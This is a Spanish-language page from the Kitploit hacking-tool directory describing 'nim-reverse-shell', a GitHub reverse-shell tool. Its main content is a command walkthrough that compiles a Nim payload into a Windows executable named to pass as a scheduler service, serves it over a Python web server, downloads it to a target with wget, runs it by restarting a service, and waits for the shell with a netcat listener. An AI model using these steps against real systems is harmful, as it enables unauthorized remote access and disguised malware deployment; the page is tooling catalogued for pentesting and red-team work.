Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
nim-reverse-shell — nim-reverse-shell | Kitploit
Herramientas/GitHubGitHub/h3x0v3rl0rd/nim-reverse-shell
Generación de PayloadsPost-ExplotaciónPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubh3x0v3rl0rd/nim-reverse-shell

nim-reverse-shell

nim-reverse-shell

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

nim-reverse-shell

nim-reverse-shell

Ejemplo:

root@kitploit:~
sudo apt install nim

actualiza el script en consecuencia

image

root@kitploit:~
nim c -d:mingw --app:gui --opt:speed -o:spoofer-scheduler.exe reverse.nim

image

root@kitploit:~
python3 -m http.server 8888
root@kitploit:~
wget http://tun0:8888/spoofer-scheduler.exe -o spoofer-scheduler.exe

image

root@kitploit:~
sc.exe stop spoofer-scheduler
sc.exe start spoofer-scheduler

image

root@kitploit:~
nc -nlvp 8080

image

Descargar herramienta